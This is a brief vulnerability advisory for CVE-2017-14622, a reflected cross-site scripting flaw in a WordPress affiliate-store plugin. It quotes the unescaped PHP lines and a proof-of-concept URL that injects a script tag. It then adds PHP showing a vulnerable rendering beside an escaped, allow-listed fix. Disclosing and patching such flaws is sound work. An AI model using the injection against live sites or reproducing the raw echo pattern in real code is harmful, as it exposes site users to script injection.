2kb Amazon Affiliates Store (XSS) CVE-2017-14622

Cross-site scripting in the WordPress plugin “2kb Amazon Affiliates Store”, version 2.1.0 (https://es.wordpress.org/plugins/2kb-amazon-affiliates-store/).

The GET parameters “page” and “kbAction” are echoed into hidden form fields without any filtering or escaping, so a crafted request can inject HTML and script into the page.

<input type="hidden" name="page" value="<?php echo $_GET['page'];?>"/>
<input type="hidden" name="kbAction" value="<?php echo $_GET['kbAction'];?>"/>

Example of injection:

http://localhost/wordpress/wp-admin/admin.php?page=kbAmz&kbAction=demo"><script>alert(1234)</script>
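The two hidden fields rendered vulnerably and then with attribute-context escaping, as an added example that is not the plugin's code. It runs on plain PHP by falling back to htmlspecialchars() when WordPress's esc_attr() is not loaded; the allow-list of kbAction values is hypothetical.

```php
<?php
// Added example (not the plugin's code): the attribute-context XSS from the
// advisory beside a hardened rendering. Under WordPress the real esc_attr()
// is used; this fallback exists only so the script runs stand-alone.
if (!function_exists('esc_attr')) {
    function esc_attr($text) {
        // ENT_QUOTES matters here: the value sits inside a double-quoted
        // attribute, so an unescaped " would close it.
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }
}

// Constructed request mirroring the advisory's proof of concept.
$_GET['page']     = 'kbAmz';
$_GET['kbAction'] = 'demo"><script>alert(1234)</script>';

// Vulnerable pattern from the advisory: a raw $_GET value echoed straight
// into the value attribute. The " in the payload ends the attribute and
// the rest of the string becomes markup.
function render_hidden_vulnerable($name) {
    return '<input type="hidden" name="' . $name . '" value="' . $_GET[$name] . '"/>';
}

// Hardened: the value is escaped for attribute context, and when an
// allow-list (hypothetical action names) is given, anything not on it is
// dropped instead of being reflected back to the browser.
function render_hidden_hardened($name, ?array $allowed = null) {
    $value = isset($_GET[$name]) ? (string) $_GET[$name] : '';
    if ($allowed !== null && !in_array($value, $allowed, true)) {
        $value = '';
    }
    return '<input type="hidden" name="' . esc_attr($name)
         . '" value="' . esc_attr($value) . '"/>';
}

echo render_hidden_vulnerable('kbAction'), "\n";
echo render_hidden_hardened('page'), "\n";
echo render_hidden_hardened('kbAction', ['demo', 'list', 'settings']), "\n";
```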

adm1n
